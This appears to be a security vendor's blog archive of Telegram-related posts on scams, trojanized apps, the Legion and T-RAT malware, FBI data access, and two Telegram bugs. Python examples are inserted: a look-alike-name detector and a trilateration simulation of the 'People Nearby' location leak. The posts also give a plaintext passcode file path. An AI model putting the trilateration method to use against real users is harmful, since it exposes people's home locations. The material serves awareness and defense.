Telegram Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Thu, 29 Aug 2024 21:03:15 +0000, en-US

Top 11 Telegram Scams in 2024
https://gridinsoft.com/blogs/top-11-latest-telegram-scams/
Wed, 15 May 2024 05:59:02 +0000

With more than 800 million active users, Telegram is one of the most popular messengers in the world. However, its popularity and high level of security have also made it a favorite among hackers and scammers. Scammers use social engineering tactics to get you to reveal personal information (PII) such as your credit card number, social security number (SSN), or two-factor authentication codes (2FA) for cryptocurrency and social media accounts. So, what are the most common Telegram scams to watch out for? And how do you distinguish a Telegram imposter from a legitimate friend or contact?

What are Telegram Scams?

Telegram scams are schemes that either operate within the Telegram app itself or lure users from the app to a dangerous third-party site. Scammers flock to Telegram because of its popularity and ease of use. All you need to sign up is a phone number. Scams range from traditional phishing schemes to sophisticated bot attacks masquerading as legitimate customer service agents. Here are examples of the most common methods of fraud in Telegram:

  • Phishing attacks. A Telegram user poses as someone the victim would trust (such as a friend, colleague, or support agent) to trick the victim into revealing personal information.
  • Off-platform fraud. Someone sends the victim a link or asks them to leave Telegram for a “safer site”. Cybercriminals can use this site to steal personal information or even infect the device with malware.
  • Attacks through Telegram bots. Because Telegram allows users to create bot accounts, many fraudsters use bots to target legitimate users’ accounts. In 2020, Telegram’s administration blocked about 350,000 bot accounts because fraudsters and criminals were using them.
  • Crypto fraud. Telegram has become a popular platform for people interested in cryptocurrencies and blockchain, so many cybercriminals target Telegram users, aiming to access their cryptocurrency wallets and transfer their bitcoins (BTC), Ethereum, and other coins to themselves.

Top 11 Telegram Scams in 2024

These are just a few examples of the broad categories of scams users can run into on Telegram. Unfortunately, scammers keep finding new ways to commit fraud and steal personal information from unsuspecting Telegram users. Next, we’ll look at the Telegram scam methods you should be wary of.

Fake Telegram channels and groups

Telegram channels and groups are places where many like-minded people can get together and discuss topics that interest them. However, scammers often create “copycat” versions of popular channels to lure victims into fake ones. These channels look just like the ones the victims know: they may have similar names and profile images, the same pinned posts, and administrators with usernames nearly identical to the legitimate ones. You will also see a lot of activity from “users” actively chattering about promotions, get-rich-quick schemes, or supposed free prizes promoted by the channel. (Most of these channels target cryptocurrency investors with instant token sales ahead of a launch.) Soon, other users or administrators will start contacting the potential victim to get them to click a link or provide personal information, which can then be used to steal their identity or hijack the account.

[Image: Fake Telegram channels and groups. Some copycat groups are made to look as similar to the original as possible.]

How to spot the scam

If you have been added to (or have joined) a new Telegram group, check whether you can send messages. If there is no such option, this is a “broadcast-only” channel, meaning that only administrators can post messages.

What to do:

  • Report impostors or dangerous channels.
  • Change your privacy settings to prevent everyone from adding you to new groups and channels.

Telegram Crypto Expert Scams

Telegram is probably the most popular messaging platform for people who are into cryptocurrencies and blockchain. Clever scammers have taken advantage of this fact and started posing as crypto experts on Telegram to extract coins, money, or login credentials from victims. Most of these scams promise a “guaranteed” return on your cryptocurrency investment. Scammers post replies to comments on Twitter or contact the victim directly on Telegram, claiming they can deliver a 50% return on investment. If the victim takes the bait, the scammers will ask them to open an account at their “special” crypto exchange. They will also show charts and graphs demonstrating that the investment is growing. However, when the victim tries to withdraw their “earnings”, the scammer disappears.

A man once sent $50 in bitcoin to such an exchange and soon made a $30 profit. He then told his friends, who all invested their savings in the scam. But once his friends had sent all the money in, the fake broker disappeared along with it.

How to spot the Crypto Expert Scam

The FBI estimates that about 25,000 people were victims of cryptocurrency fraud last year and lost nearly $1 billion. If someone promises a “guaranteed” income or claims access to a “special” cryptocurrency exchange, these are clear signs of Telegram cryptocurrency investment fraud.

What to do:

  • Ignore anyone who claims a “guaranteed” return on any investment, especially cryptocurrency.
  • Do not invest in “special” cryptocurrency exchanges, as they are often counterfeited.
  • Never send money, cryptocurrency, or account information to someone you have only communicated with on Telegram or other messaging platforms such as WhatsApp.

Phishing with Telegram Bots

Since Telegram allows ordinary users to create and use bots on the platform, scammers couldn’t help but take advantage of it. Telegram bots use natural language processing and AI to engage in realistic conversations, making it difficult to tell that you are being scammed. In one such scam, hackers used the SMSRanger bot to impersonate representatives of banks and companies like Apple Pay, Google Pay, and PayPal. Forums claim that such bots are about 80% effective if the user answers the call. Worse, anyone can rent these bots for only $300 a month.

[Image: Phishing with Telegram bots. One of the thousands of bots that supposedly offer earnings.]

How to spot the Telegram Bots Phishing

Telegram bot scams show typical signs of phishing:

  • A sense of urgency.
  • Fake or strange phone numbers.
  • Grammatical and spelling errors.
  • Requests for confidential information.

What to do:

If you receive a phone call from somebody claiming to be from your bank, hang up and call the bank back using its official number. Keep in mind that scammers can spoof or disguise their number to make it look like the call is coming from someone else.

Remember: a legitimate company will never contact you via Telegram or any other third-party messaging platform.

Telegram Tech Support Scams

Sometimes scammers create accounts that mimic legitimate support agents. They use bots to scan groups and channels for keywords and phrases and then contact victims claiming to be from the company. Along the way, they start asking the victim for confidential information or demanding payment for “premium” support. Such accounts may carry realistic names (e.g., “Coinbase Support Chat”). They may even ask for remote access to your laptop to “fix” the problem.

How to spot Tech Support Scams

If you are dealing with problems with a company or account, always contact them directly through official channels. Be wary of any account that contacts you first and offers support. Likewise, avoid those who charge for “premium” support or make you pay to “upgrade” your account. These are scammers.

What to do:

  • Pay attention to the account’s username to see if it matches its displayed name.
  • Block and report all suspicious accounts to both Telegram and the impersonator company.

Telegram Cryptocurrency Giveaways

Free prizes, sweepstakes, and raffles are some of the oldest types of scams. In these scams, a bot or user pretends to offer gifts from well-known companies (such as Amazon, Apple, or Venmo) or cryptocurrency exchanges. However, to receive the prize, you must provide your banking information and personal details and pay a “commission”. Once you give the scammers what they want, they disappear.

[Image: Cryptocurrency giveaway scam. Old as the world: the scheme in which you have to pay a small fee to get the prize.]

How to spot the Cryptocurrency Scam

Some companies do run raffles, but almost all of them require you to take some initial action to enter. If you haven’t entered any raffle, a message claiming you have won is most likely a scam. In such cases, it is best to contact the company directly to check whether the drawing is genuine.

What to do:

  • Never pay a “commission” to claim a prize, especially if you are asked to pay in cryptocurrency or through payment applications such as Zelle, Venmo, or Cash App.
  • Block any accounts that contact you and claim to be offering a prize.

Fake Admin Accounts

Each Telegram username is unique, which prevents a scammer from copying an existing username exactly. To pull off their dirty business, scammers instead create usernames that look similar to the original. Such accounts may also contact the victim to “help” after the victim asks a general question in a group. In reality, the scammers are trying to gain access to the account or lure the victim off the platform, where they can scam them with a phishing site.

How to spot the Fake Admin Scam

Pay attention to the account name and misspellings or permutations of letters in the name, especially if the username and display name don’t match. For example, “TichSupport” instead of “TechSupport”, or fake “BitgetToken” instead of “bitgetEN”. In some cases, the username may be hidden. Also, be careful of users who send you private messages rather than posting them publicly in a group. Private messages are a favorite tool of Telegram scammers, as these messages make it difficult to verify whom you’re communicating with.

What to do if you encounter Telegram scammers:

  • Never share personal information or passwords in a direct message.
  • Search the group to find messages from the user who contacted you. If nothing comes up, you’re probably dealing with a scammer.
  • Report fraudulent accounts to both Telegram and the company you asked the question to.

Classiscam: Fake Classified AD scams

The “Classiscam” scheme is a Telegram bot scam that has lured $6.5 million from victims. Criminals create fake listings for products such as laptops, cameras, and iOS devices on classified-ad sites. The ad asks the victim to contact the seller on Telegram to discuss the deal. However, when the victim sends a message, they are connected to a bot designed to steal personal information.

Alternatively, the Telegram scammers contact the victim directly on Telegram and then send them a link to their listing. When the victim clicks on it, they are taken to a page that looks almost identical to Facebook Marketplace, Craigslist, or a similar site. To complete the sale, the victim is asked for personal information, including their home address and credit card details.

How to spot Classiscam

Look for the red flags of online sales scams: suspiciously low prices, and sellers who refuse to meet in person or ask you to talk to them via Telegram. If you are taken to a site to complete a sale, look out for odd design details, spelling or grammatical errors, or an “unsecured” URL. (A secure URL uses HTTPS; an unprotected one uses plain HTTP.)

What to do:

  • Always try to review items in person or verify sellers before sending them payments or any information.
  • Use only payment platforms that protect your money, such as PayPal or credit cards. Then, if you’ve been scammed, you’ll have a better chance of getting your lost money back through these payment methods.

“Pump And Dump” in Telegram Crypto Channels

In this scam, Telegram channel owners try to manipulate the price of a cryptocurrency with the help of a large group of participants. The administrators claim to have “special” knowledge; in reality, they are trying to inflate the value of an asset they own and then sell it before the price collapses. Sometimes administrators also charge a fee for VIP membership, which hits their victims twice.

[Image: Pump and dump scam in crypto channels. Another group that will “make you a billionaire” if you buy a premium subscription.]

How to spot Pump And Dump

Many of these fraudulent Telegram channels call themselves “signal groups”. One common sign of a scam is a sense of urgency: these groups try to get you to act quickly without thinking and make you fear that you might miss out on a great opportunity. Remember the golden rule: if something seems too good to be true, it probably is.

What to do:

  • Don’t be fooled by a sense of urgency. Always do your due diligence before investing.
  • Look up the history of this group. How successful have they been in predicting price increases in the past?

Fake Job Offers over Telegram

Job scams are widespread on professional platforms such as LinkedIn, and many use Telegram as one of their elements. Fake employers post tempting job listings with high salaries and flexible work schedules. Their only requirement is that the victim adds the “Hiring Manager” on Telegram. Once the victim contacts the manager, the scammers try to get them to provide confidential information or ask for payment for training materials.

How to spot the Fake Job Scam

Almost all fake job scams follow the same formula. The “employer” offers terms that are too good to be true and demands that you contact them via Telegram for an interview. The scammers then ask for more information (like your SSN), the kind of data a legitimate job application would also require. They may also ask you to pay for training materials with your own money or with a check they send you. Either way, you will never get a refund, and the check will bounce.

What to do:

  • Look for signs that the job is a scam. These may include a very short interview or no paperwork when the recruiter says you are “hired”.
  • Do not give recruiters personal or confidential information until you have seen an official contract and met them in person.

“Friend in Need” scams

In this scam, scammers gather enough information about the victim’s friends or family to impersonate one of them, then approach the victim and ask for financial help. For example, they may tell you that they have been in a car accident and need your help paying medical bills.

How to spot the “Friend in Need” scam:

Listen to the language they use. Does it sound like your friend? Are they misusing words or constructing sentences awkwardly? Also, pay attention to their sense of urgency: would your friend ask you for this favor without any context or explanation?

What to do:

  • If you can, call this person by phone or reach them through another communication channel to find out whether the request is genuine.
  • If there is no way to call, ask questions that only the real person could answer, such as details of things you did together recently (and that you haven’t written about online).
  • If you confirm it’s a scammer, immediately block the account and notify its real owner that it has been hacked.
  • Let your friends know so they won’t be targeted next.

Telegram Romance Scams

Sometimes scammers engage in an online romance with a victim to gain their trust. On Telegram, this often centers on hook-ups or sexual content. Many scammers ask for gifts or money to cover the expenses of travelling to the victim. A Reddit user once described chatting with a woman on Telegram who said she couldn’t meet because she needed to babysit; she asked for a Steam gift card so her kids could be kept busy (gift cards are often requested in scams because they are a form of currency that cannot be traced). Alternatively, scammers may ask the victim to send them photos or videos of a sexual nature, which they can then use for blackmail.

How to spot a Romance Scam:

The person can never meet in person and always has excuses that prevent even a video call. Instead, they try to make the relationship intimate as quickly as possible by sending sensitive photos (which are usually stolen from other accounts). The most reliable sign of a scammer, however, is when they ask for money.

What to do:

  • Never, under any circumstances, send money to people you’ve only met on Telegram, regardless of what they tell you to do.
  • Don’t give out too much personal information at once. Even simple questions about your family or work can be used to hack your accounts or brute force your passwords.

How To Prevent Telegram Scams

  • Be as vigilant as possible about all links, even if a friend sent them.
  • Configure your privacy settings. Once you create your Telegram account, ensure end-to-end encryption is enabled. Set a passcode or fingerprint lock and add two-step authentication (2FA) for extra security.
[Image: How to prevent Telegram scams. Optimal privacy settings.]
  • Never share your login credentials. Don’t trust threatening messages purporting to come from Telegram, cryptocurrency services, banks, or any other websites that store your personal information.
  • Keep the phone number associated with your account up to date. This will help confirm that the account belongs to you if you lose access.

Spyware in Fake Telegram Apps Infected Over 10 million Users
https://gridinsoft.com/blogs/fake-telegram-apps-spyware/
Tue, 12 Sep 2023 14:12:15 +0000

It is important to exercise caution when using messenger mods. There have been reports of spyware disguised as modified versions of Telegram on the Google Play Store. This malware is designed to extract sensitive information from compromised Android devices. Despite these risks, many users still blindly trust any app verified and published on Google Play. We have repeatedly warned about the dangers of downloading apps from Google Play: it could result in inadvertently installing a Trojan, a backdoor, a malicious subscriber, or other harmful software.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store version is identified by the package name “org.telegram.messenger”, while the APK file downloaded directly from Telegram’s website uses the package name “org.telegram.messenger.web”. The threat actors used malicious packages named “wab”, “wcb”, and “wob” to trick users into downloading fake Telegram apps. Despite looking like the authentic Telegram app with a localized interface, the infected versions contained an additional module that Google Play moderators missed. A few days ago, experts revealed that a malware campaign called BadBazaar was using such rogue Telegram clients to gather chat backups.
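The near-miss package names above (“wab”, “wcb”, “wob” next to the genuine org.telegram.messenger.web) and the look-alike admin usernames from the scams article (“TichSupport” for “TechSupport”, “BitgetToken” for “bitgetEN”) are the same typosquatting trick, and a defender can catch most of them automatically. The following Python script is an added example, not Gridinsoft’s or Telegram’s code: it normalizes names (case folding, diacritics, digit-for-letter swaps, separators) and scores each candidate against an allow-list of genuine names with difflib. The allow-list, the confusables map, the 0.8 cut-off and the sample inputs are constructed for the demo; in particular the fake package names are assumed to take the full form org.telegram.messenger.wab, which the article does not spell out.

```python
"""Flag look-alike Telegram usernames and Android package names.

Added example, not Gridinsoft's or Telegram's code. The allow-list and the
sample candidates are constructed for the demo; only TechSupport/TichSupport,
bitgetEN/BitgetToken and the org.telegram.messenger(.web) package names come
from the articles, and the ".wab" suffix form is an assumption.
"""
from difflib import SequenceMatcher
import unicodedata

# Digit-for-letter swaps and separators that scammers use to dodge an
# exact-match check. Assumption for the demo, not a full confusables table.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "8": "b",
    "_": "", "-": "", ".": "",
})

# Names we consider genuine (constructed allow-list for the demo).
GENUINE = [
    "TechSupport",                 # legitimate admin username (article example)
    "bitgetEN",                    # legitimate channel username (article example)
    "org.telegram.messenger",      # Telegram's Play Store package name
    "org.telegram.messenger.web",  # package name of the APK from telegram.org
]


def normalize(name: str) -> str:
    """Fold case, drop diacritics and map common look-alike characters so that
    'T3ch_Supp0rt' and 'TechSupport' compare equal."""
    decomposed = unicodedata.normalize("NFKD", name)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return stripped.lower().translate(CONFUSABLES)


def similarity(a: str, b: str) -> float:
    """Ratio in [0, 1] between the normalized forms (1.0 = identical)."""
    return SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def classify(candidate: str, genuine=GENUINE, threshold: float = 0.8):
    """Return (verdict, closest_genuine_name, score).

    verdict is 'genuine' for an exact allow-list hit, 'lookalike' when the
    normalized name is within `threshold` of an allow-listed one, otherwise
    'unrelated'. The 0.8 cut-off is a demo choice; tune it on real data.
    """
    if candidate in genuine:
        return "genuine", candidate, 1.0
    closest = max(genuine, key=lambda g: similarity(candidate, g))
    score = similarity(candidate, closest)
    verdict = "lookalike" if score >= threshold else "unrelated"
    return verdict, closest, round(score, 3)


def scan(candidates, genuine=GENUINE, threshold: float = 0.8):
    """Classify a batch and return only the names worth a human's attention:
    {candidate: (closest genuine name, score)} for every look-alike."""
    report = {}
    for name in candidates:
        verdict, closest, score = classify(name, genuine, threshold)
        if verdict == "lookalike":
            report[name] = (closest, score)
    return report


if __name__ == "__main__":
    # Constructed sample: article examples plus made-up names.
    samples = ["TichSupport", "BitgetToken", "T3ch_Supp0rt", "weatherbot",
               "org.telegram.messenger.wab", "org.telegram.messenger.web"]
    for name in samples:
        print(f"{name:28} -> {classify(name)}")
    print("look-alikes:", scan(samples))
```

The exact-match check comes first so that the genuine `.web` package is never reported as a look-alike of the plain Play Store name; everything else is judged on the normalized form, which is why “T3ch_Supp0rt” scores 1.0 against “TechSupport”. A name that scores “unrelated” has simply not been modelled on anything in the allow-list, not proven safe, so the script is a triage filter, not a verdict.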

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play that claim to be versions of Telegram in Uyghur, Simplified Chinese, and Traditional Chinese languages. These apps have descriptions written in their respective languages and contain images that are very similar to the official Telegram page on Google Play, making it difficult to distinguish them from the genuine app.

The devs of these fake apps promote them as a faster version of a regular client, citing a distributed network of data centers worldwide. They use this as bait to persuade users to download the mods instead of the official Telegram app.

[Image: Examples of fake Telegram apps. Simplified Chinese, Traditional Chinese, and Uyghur versions of Telegram on Google Play with spyware inside.]

How dangerous are fake Telegram apps?

Millions of users have downloaded apps that were found to have malicious features. Among other things, malicious copies have functionality to capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. Experts who discovered this activity have codenamed it Evil Telegram. Google has since taken down these apps from its platform.

Nonetheless, the poor app moderation problem in Google Play has persisted for almost a decade. You can upload literally whatever you want (even malware) and it may be deleted only after numerous reports saying it is malicious. And there’s still no guarantee that the reports will be processed in a reasonable time; some rogue apps remain on Google Play for months. For that reason, the threat will most probably resurface later, especially considering the growing popularity of Telegram.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

  • As I’ve just said, Google Play isn’t completely immune to malware attacks. However, it’s still a much safer option than other sources, so always download and install apps from official stores.
  • Before installing any app, even from official stores, please take a closer look at its page and ensure it’s legitimate. Pay attention to the app’s name and developer. Cybercriminals frequently apply typosquatting or spoofing in order to spread their malware.
  • Reading negative user reviews is a good way to identify potential issues with an app. If there’s a problem with an app, someone has likely already written about it. Also try searching for reviews on the web; there are plenty of sites where you can leave feedback without any censorship from the developer or Google. Using several independent sources will give you a clearer view.

Legion Hacker Tool Used to Steal Data from Poorly Protected Websites
https://gridinsoft.com/blogs/legion-hacker-tool/
Wed, 19 Apr 2023 09:37:11 +0000

Experts have discovered a Python-based Legion hacking tool that is sold via Telegram and is used as a way to hack into various online services for further exploitation.

Let me remind you that we also wrote that Microsoft Told How To Detect The Installation Of The BlackLotus UEFI Bootkit, and also that Experts discovered ESPecter UEFI bootkit used for espionage.

Attacks with Legion Hacker Tool

According to Cado Labs researchers, the Legion malware has modules for enumerating vulnerable SMTP servers, conducting remote code execution (RCE) attacks, exploiting unpatched versions of Apache, brute-forcing cPanel and WebHost Manager (WHM) accounts, interacting with the Shodan API, and abusing AWS services.

The researchers say the malware shares similarities with another malware family, AndroxGh0st, which was first discovered by cloud security provider Lacework in December 2022.

Last month, SentinelOne published an analysis of AndroxGh0st, which showed that the malware is part of the AlienFox toolkit, which is offered to criminals to steal API keys and secrets from cloud services.

Experts: “Legion appears to be part of a new generation of cloud credential harvesting and spam utilities. The developers of these tools often steal code from each other, making attribution difficult.”

In addition to using Telegram to extract data, Legion is designed to hack web servers with CMS, PHP, or PHP-based frameworks such as Laravel.

Cado Labs’ report: “It is capable of obtaining credentials for a wide range of web services such as email providers, cloud providers, server management systems, databases, and payment platforms, including Stripe and PayPal.”

Other targeted services include SendGrid, Twilio, Nexmo, AWS, Mailgun, Plivo, ClickSend, Mandrill, Mailjet, MessageBird, Vonage, Exotel, OneSignal, Clickatell, and TokBox.

[Image: Legion hacker tool. Services attacked by Legion.]

In addition, Legion extracts AWS credentials from insecure or misconfigured web servers and sends spam SMS to users of US operators, including AT&T, Sprint, T-Mobile, Verizon, and Virgin.

What is Legion used for?

The main goal of the malware is to use the infrastructure of hijacked services for subsequent attacks, including bulk spam mailings and opportunistic phishing campaigns.

The researchers also discovered a YouTube channel (created June 15, 2021) containing tutorial videos on Legion. Experts conclude that “the tool is widespread and most likely is paid malware.”

[Image: Legion hacker tool. “Educational videos” published by the hacker.]

The location of the creator of this tool, who uses the Telegram nickname forzatools, remains unknown, although the presence of comments in Indonesian in the code indicates that the developer may be Indonesian or located in that country.

Unlocking the Secrets of Messaging Apps: An In-Depth FBI Study Guide on Accessible Data for Law Enforcement
https://gridinsoft.com/blogs/fbi-study-guide-showed-what-data-officers-can-get-from-messengers/
Thu, 02 Dec 2021 06:08:00 +0000

An FBI study guide has been made publicly available as part of a Freedom of Information law request filed by Property of the People, an American non-profit organization that deals with government transparency.

The resulting document contains training tips for agents and explains what kind of data can be obtained from the operators of various messengers and what legal permissions will be required for this.

[Image: Secure messaging apps data.]

The document is dated January 7, 2021, and, in general, does not contain any fundamentally new information, but it gives a good idea of what information the FBI can currently obtain from services such as iMessage, Line, WhatsApp, Signal, Telegram, Threema, Viber, WeChat and Wickr.

It was previously known that the FBI has legal leverage to obtain personal information even from the operators of secure messengers (which usually focus on confidentiality), as Forbes reporter Thomas Brewster noted on Twitter.

In general, the training document confirms that usually the FBI cannot access the encrypted messages themselves, but they can request other types of information that can also be useful in investigations.

Application: legal permissions and other details

Apple iMessage: reading message content is limited.
  • Subpoena: helps find out basic information about a subscriber.
  • 18 USC §2703(d): helps identify iMessage lookups for 25 days from the specified date.
  • Pen register: not possible.
  • Search warrant: helps obtain backups from the target device; if the target uses iCloud backups, encryption keys must be provided, and iMessages can also be retrieved from iCloud if the target has activated Messages in iCloud.

Line: reading of message content is limited.
  • Registration data of the suspect and/or victim (profile picture, name, email address, phone number, LINE ID, registration date, etc.).
  • Usage information.
  • Content of text chats for a maximum of 7 days for specified users (only if end-to-end encryption is not active, and only if a valid warrant is received; videos, images, files, location data, voice calls, and other such data will not be disclosed).

Signal: the content of messages cannot be read.
  • Date and time of user registration.
  • Last date when the user connected to the service.

Telegram: the content of messages cannot be read.
  • No user contact information is provided to law enforcement in response to a court order. According to Telegram’s privacy statement, Telegram may disclose the IP address and phone number to the relevant authorities for confirmed terrorist investigations.

Threema: the content of messages cannot be read.
  • A hash of the phone number and email address, if provided by the user.
  • Push token, if a push service is used.
  • Public key.
  • Date (no time) when the Threema ID was created.
  • Date (no time) of last login.

Viber: the content of messages cannot be read.
  • Provided credentials (i.e. phone number), registration data, and IP address at the time of creation.
  • Message history: time, date, source number, and destination number.

WeChat: the content of messages cannot be read.
  • Subpoenas and account preservation requests are accepted, but data for accounts created in China is not provided.
  • For accounts outside of China, basic information (name, phone number, email address, IP address) is provided, retained as long as the account is active.

WhatsApp: reading message content is limited.
  • Subpoena: helps get basic subscriber data.
  • Court order: same as subpoena, plus information about blocked users.
  • Search warrant: lets you get contacts from the target’s address book and find out which WhatsApp users have the target in their address book.
  • Pen register: transmits source and destination metadata for every message every 15 minutes.
  • If the target is using an iPhone and iCloud backup is enabled, the iCloud data may contain WhatsApp data, including message content.

Wickr: the content of messages cannot be read.
  • The date and time the account was created.
  • The type of devices on which the application is installed.
  • Date of last use.
  • Number of messages.
  • The number of external IDs (email addresses and phone numbers) connected to the account, but not the IDs themselves in plain text.
  • Avatar.
  • Limited information about recent changes to account settings, including adding or suspending devices (does not include message content or routing and delivery information).
  • Wickr version number.

Let me remind you that I also reported that the FBI removed web shells from vulnerable Microsoft Exchange servers without informing their owners.

Telegram for macOS did not delete self-destructing videos (https://gridinsoft.com/blogs/telegram-for-macos-did-not-delete-videos/, published Mon, 15 Feb 2021 16:26:58 +0000)

Telegram developers have fixed a bug due to which self-destructing audio and video were not removed from devices running macOS.

Let me remind you that in the secret chat mode, you cannot forward messages to other users, and it is also possible to configure automatic self-destruction of all messages and multimedia after a certain time.

Independent information security specialist Dhiraj Mishra discovered that in Telegram version 7.3, self-destructing messages were not completely deleted from the recipient’s device.

“While understanding the implementation of various security and privacy measures in Telegram, I identified that Telegram fails again in terms of handling the users’ data. Telegram, which has 500 million active users, suffers from a logical bug that exists in Telegram for macOS, which stores the local copy of received messages (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat”, – Dhiraj Mishra wrote.

The expert noticed that on macOS, the video and audio files received in standard chats are stored at a custom path outside the sandbox. Secret chats use the same path, so the received media files remain there even after the messages in the chat itself have already self-destructed, as intended.

“Bob (the attacker, using tdesktop on macOS) and Alice (the victim) have a secret chat, and Alice sends an audio/video message to Bob with a self-destruct timer of 20 seconds. Although the message is removed from the chat after 20 seconds, it is still available through Bob’s custom path; here Telegram cannot prevent privacy for Alice. In general, the function of self-destruction and work without traces does not work”, – the expert writes.

Additionally, Mishra discovered that Telegram was storing the local access codes used to unlock the app in plain text, as JSON files in the Users/[username]/Library/GroupContainers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata folder.

The researcher discovered both problems at the end of December 2020, and they were fixed with the release of Telegram 7.4. Mishra received a reward of $3,000 for reporting both bugs.

Let me remind you that I also reported that a researcher discovered a vulnerability in Telegram that allows locating users.

Researcher discovered vulnerability in Telegram, which allows to locate user (https://gridinsoft.com/blogs/researcher-discovered-vulnerability-in-telegram-which-allows-to-locate-user/, published Thu, 07 Jan 2021 10:20:03 +0000)

A researcher has discovered a vulnerability in Telegram. The messenger offers a “People Nearby” feature, and through it the location of a user can be determined to within a few tens of meters.

Enthusiast Ahmed Hasan posted a message about the vulnerability found on his blog.

Several years ago, he had already reported a similar flaw to the Line messenger development team. The creators of the messenger paid Hasan a bounty of $1,000 and fixed the problem.

“A few days ago, I installed Telegram, and I noticed that they have the same feature. I tried to see if I can unmask other users’ locations, and I found they have the same issue I discovered in the Line app a few years ago. I reported the problem to Telegram security, and they said it’s not an issue. If you enable the feature of making yourself visible on the map, you’re publishing your home address online. A lot of users don’t know this when they enable that feature”, – wrote Ahmed Hasan.

Although Telegram only shows the distance to a particular user in the list, their exact location can be determined using triangulation.

“If you notice, Telegram is telling how far each person is from me. An adversary can spoof their location for three points and use them to draw three triangulation circles”, – reports Ahmed Hasan.

To do this, one changes their own location twice, noting the reported distance to the user each time, and then draws on a map (for example, Google Maps) three circles, each centred on one of the three observation points and with a radius equal to the distance reported there. The user is at the intersection of the circles.

[Image: Researcher discovered vulnerability in Telegram]

Let me remind you, by the way, that a researcher earned $10,000 by finding an XSS vulnerability in Google Maps.

At the same time, only those users who have enabled the “People Nearby” function can be found this way.

“Telegram told me that this is not a problem. If you are using this feature, be sure to disable it, unless you want your location to be available to everyone”, – said Ahmed Hasan.

It should be noted that other applications that compute the distance between users mitigate this by adding a random offset to the coordinates, which makes it impossible to determine the real geolocation; in the case of Telegram, the developers decided to forgo this additional security measure.
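As an added illustration (not code from the post or from Hasan), the following Python example works through the three-circle solve the post describes on a flat-plane metre grid, and then applies the coordinate-offset mitigation mentioned above to show how much of the location it hides. The observer positions, the user position and the fixed offset are constructed values.

```python
import math
from typing import Sequence, Tuple

Point = Tuple[float, float]


def distance(a: Point, b: Point) -> float:
    """Euclidean distance in metres on a local flat-plane approximation."""
    return math.hypot(a[0] - b[0], a[1] - b[1])


def trilaterate(centres: Sequence[Point], radii: Sequence[float]) -> Point:
    """Point where three distance circles meet.

    Subtracting the first circle equation from the other two removes the
    squared unknowns and leaves a 2x2 linear system, solved with Cramer's rule.
    """
    (x1, y1), (x2, y2), (x3, y3) = centres
    d1, d2, d3 = radii
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    k1 = d1 ** 2 - d2 ** 2 + x2 ** 2 - x1 ** 2 + y2 ** 2 - y1 ** 2
    k2 = d1 ** 2 - d3 ** 2 + x3 ** 2 - x1 ** 2 + y3 ** 2 - y1 ** 2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-9:
        raise ValueError("the three observation points must not be collinear")
    return ((k1 * b2 - k2 * b1) / det, (a1 * k2 - a2 * k1) / det)


def reported_distance(observer: Point, true_pos: Point, offset: Point = (0.0, 0.0)) -> float:
    """Distance the service hands out. With offset=(0, 0) this is the behaviour the
    post describes. A non-zero offset models the mitigation used by other apps: the
    distance is measured to a shifted position, and the shift is a random value
    chosen once per user and kept fixed, so repeated queries cannot average it out."""
    shifted = (true_pos[0] + offset[0], true_pos[1] + offset[1])
    return distance(observer, shifted)


def recovered_position(true_pos: Point, observers: Sequence[Point],
                       offset: Point = (0.0, 0.0)) -> Point:
    """Simulate three distance queries from three observation points and solve for the user."""
    radii = [reported_distance(o, true_pos, offset) for o in observers]
    return trilaterate(observers, radii)


def leak_error(true_pos: Point, observers: Sequence[Point], offset: Point = (0.0, 0.0)) -> float:
    """How far (metres) the recovered point is from the user's real position."""
    return distance(recovered_position(true_pos, observers, offset), true_pos)


# Constructed scenario: observation points at three corners of a 1 km square.
OBSERVERS = [(0.0, 0.0), (1000.0, 0.0), (0.0, 1000.0)]
USER = (300.0, 400.0)
FIXED_OFFSET = (-150.0, 90.0)  # constructed per-user random shift for the mitigation

if __name__ == "__main__":
    print("exact distances  ->", recovered_position(USER, OBSERVERS), leak_error(USER, OBSERVERS))
    print("offset distances ->", recovered_position(USER, OBSERVERS, FIXED_OFFSET),
          leak_error(USER, OBSERVERS, FIXED_OFFSET))
```

With exact distances the solve lands on the user's real coordinates; with the fixed offset it lands on the shifted point instead, so the recovered location is off by the length of the offset (about 175 m here) no matter how many queries are made.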

New T-RAT malware can be controlled via Telegram (https://gridinsoft.com/blogs/new-t-rat-malware-can-be-controlled-via-telegram/, published Sat, 24 Oct 2020 09:09:46 +0000)

G DATA’s specialists have published a report on the new T-RAT malware, which is being sold for only $45. The main feature of the malware is that T-RAT allows controlling infected systems through a Telegram channel rather than through a web administration panel, as is usual.

Malware creators claim that this provides faster and easier access to infected computers from anywhere, and allows them to quickly steal data. However, T-RAT can also be controlled by more traditional methods, for example via RDP and VNC.

“The T-RAT Telegram channel supports 98 commands that allow retrieving passwords and cookies from the browser, navigating the victim’s file system and searching for confidential data, deploying a keylogger, secretly recording sound through the device microphone, taking screenshots of the victim’s desktop, taking snapshots via the webcam and intercepting the contents of the clipboard”, – say G DATA experts.

In addition, T-RAT operators can use a dedicated clipboard-capture mechanism that replaces strings that look like cryptocurrency and e-wallet addresses with the attackers’ own addresses. This allows intercepting Qiwi, WMR, WMZ, WME, WMX, Yandex.Money, Payeer, CC, BTC, BTCG, Ripple, Dogecoin and Tron transactions.

The malware is also capable of running terminal commands (CMD and PowerShell), blocking the victim’s access to certain sites (for example, antivirus and technical support sites), killing specific processes (to disable security and debugging software), and even deactivating the Taskbar and Task Manager.

